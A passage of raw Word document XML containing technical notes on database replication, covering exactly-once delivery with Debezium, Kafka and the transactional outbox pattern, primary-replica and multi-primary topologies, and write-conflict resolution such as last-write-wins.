        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exactly-once delivery — the hard problem:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE49B4F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>CDC must handle connector failures without losing or duplicating events:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="592701DD" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487F55CC" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>At-least-once delivery (default):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="580B5D22" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Debezium: after delivering batch to Kafka, commits LSN to replication slot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4700BC04" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  If crash between delivery and commit: events re-delivered → duplicates</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0239B70E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B304024" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Consumers handle duplicates: idempotent writes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05199DCB" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Elasticsearch: upsert by document ID (re-applying same update = same result)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C730C4" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Database: INSERT ON CONFLICT DO UPDATE (upsert)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA695A2" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C75E2B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Exactly-once via transactional outbox pattern:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067443E8" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Application writes to database: INSERT into orders + INSERT into outbox table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="355DDC2C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  (in the same transaction — atomically)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD442FF" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261B27A0" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Debezium captures outbox table changes → publishes to Kafka</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ACBE9AE" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Outbox entry deleted after successful Kafka publish</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD0C021" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12679F03" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Guarantees:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C4BF4A8" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    Order written ↔ outbox entry written (same transaction)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F59E34" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Outbox entry → Kafka event (Debezium delivers at-least-once)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C3348B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Consumer idempotency: exactly-once semantics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C37184" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE6B790" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  The outbox pattern eliminates the dual-write problem:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A1CDB49" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Without outbox: write to DB + write to Kafka (two separate operations)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="401586C4" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">      → If crash between them: data in DB but not Kafka, or vice versa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14DFE1CD" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">      → Inconsistency between database and downstream systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE62BB8" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    With outbox: write to DB + outbox atomically, CDC delivers to Kafka</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78281F29" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">      → Downstream always reflects what's in the database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="364068B2" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:pict w14:anchorId="65D9B944">
          <v:rect id="_x0000_i5513" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FFD57CB" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4. Replication Topologies — Architectural Patterns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="151DEC80" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Primary-Replica (Single Primary)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3806B79A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>The simplest and most common topology. All writes go to the primary. Replicas receive changes and serve reads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74BE6543" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473F9EC5" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">        Writes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EBAC6E7" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">          ↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6D75DF" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    [Primary]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="184F997F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    /    |    \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C05A6E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">   /     |     \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E59F7C4" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>[R1]   [R2]   [R3]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C82F0D2" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Reads  Reads  Reads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565D813A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="5C337F36" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Primary: handles all writes, replicates to all replicas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA41F19" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Replicas: serve read-only queries, maintain copy for failover</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3949CBD0" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="5F1CBA36" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Benefits:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C2086AD" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Simple consistency model (single write point)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36DB8B9E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  No write conflicts (primary serializes all writes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F87EE1D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Read scaling via replicas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC68D7A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282E4AFA" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Limitations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12FF2181" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Primary is a write bottleneck (all writes to one server)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B50CAE" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Replica reads may be stale (replication lag)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB45F9B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Failover requires promotion (brief unavailability)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC48278" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cascading replication:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63CE022B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71361DE2" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>[Primary] → [Replica 1] → [Replica 2]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44256761" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">                        ↘ [Replica 3]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69FBCCE0" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">                        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BEFA901" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Replica 1 acts as a relay — streams to Replica 2 and 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34338054" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Reduces load on primary (only one outbound replication stream)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36CEDED3" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Adds extra lag hop for downstream replicas (Replica 2 lags behind Replica 1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="394702FE" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Used when primary WAL sender resources are limited or when adding many replicas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744AA8E8" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Multi-Primary (Multi-Master) Replication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3EB5ED" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>All nodes accept writes. Changes are propagated to all other nodes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D649CB" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED9E4F5" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>[Primary A] ←→ [Primary B] ←→ [Primary C]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="683180A4" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">     ↑               ↑               ↑</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E20F429" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">   Writes          Writes          Writes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6143A7E7" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="7B8D2F0B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t>Each node:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7252A8F0" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Accepts writes from clients</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6827E769" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Replicates its changes to all other nodes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE59A75" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Applies changes received from other nodes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C63693F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The write conflict problem — the central challenge of multi-primary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC98190" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="797C2576" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Concurrent writes to the same row on different primaries:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB609E4" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Primary A: UPDATE users SET balance = 100 WHERE id = 1  (was 200, subtract 100)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A64A91" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Primary B: UPDATE users SET balance = 150 WHERE id = 1  (was 200, subtract 50)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A87753E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A999D2" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Both read balance=200, both compute new value, both commit locally</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7F065F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Both replicate their change to the other</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="562458BB" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6CDF31" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Result after both apply each other's changes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ABB2BCD" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Primary A: balance = 150  (applied Primary B's change after its own)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698C1882" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Primary B: balance = 100  (applied Primary A's change after its own)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E95268B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF46AE0" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Diverged state — different values on different primaries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB4FF0D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  This is the "lost update" problem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A949F2" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Conflict detection and resolution strategies:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4086B9E8" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B96CFD4" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Last-Write-Wins (LWW):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33AFA3A0" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Each write carries a timestamp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74250006" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  On conflict: higher timestamp wins</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A7ECA49" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D231FC4" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Problems:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4786ACD2" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    Clock skew between nodes (NTP not perfectly synchronized)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A0CFA1" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    "Last" write may actually be an earlier logical operation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="784A1712" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Loses one of the conflicting writes — data loss by design</w:t>
      </w:r>
    </w:p>
